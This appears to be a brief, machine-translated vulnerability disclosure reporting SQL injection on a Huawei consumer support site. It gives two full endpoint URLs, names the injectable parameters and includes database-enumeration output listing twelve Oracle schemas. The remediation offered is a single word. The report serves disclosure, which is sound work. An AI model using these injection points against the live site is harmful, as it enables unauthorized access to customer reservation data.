Multiple SQL injections from a substation in Huawei
A sub-station of Huawei, Oracle Database
Http://consumer.huawei.com/support/services/service/tcsReservation/findReservationByReservationNo? Jsonp = jquery1910201111365258694_1448884905233 & reservationNo = YY15113000377 & mobile = 13333333333 & siteCode = cn & _ = 1448884905248
Parameter reservationNo
Http://consumer.huawei.com/support/services/service/tcsReservation/reservation/time? Jsonp = jquery1910201111365258694_1448884905233 & networkCode = CNA1083S05 & reservationDate = 2015-12-01 & _ = 1448884905245
NetworkCode
After reading this article, I found that there are still two items. Check with the manufacturer. After all, user information is involved.
Available databases [12]:
[*] APEX_030200
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] PERFSTAT
[*] PUBQUERY
[*] SYS
[*] SYSTEM
[*] TCSBAK
[*] TCSUSER
[*] XDB
Solution:
Filter.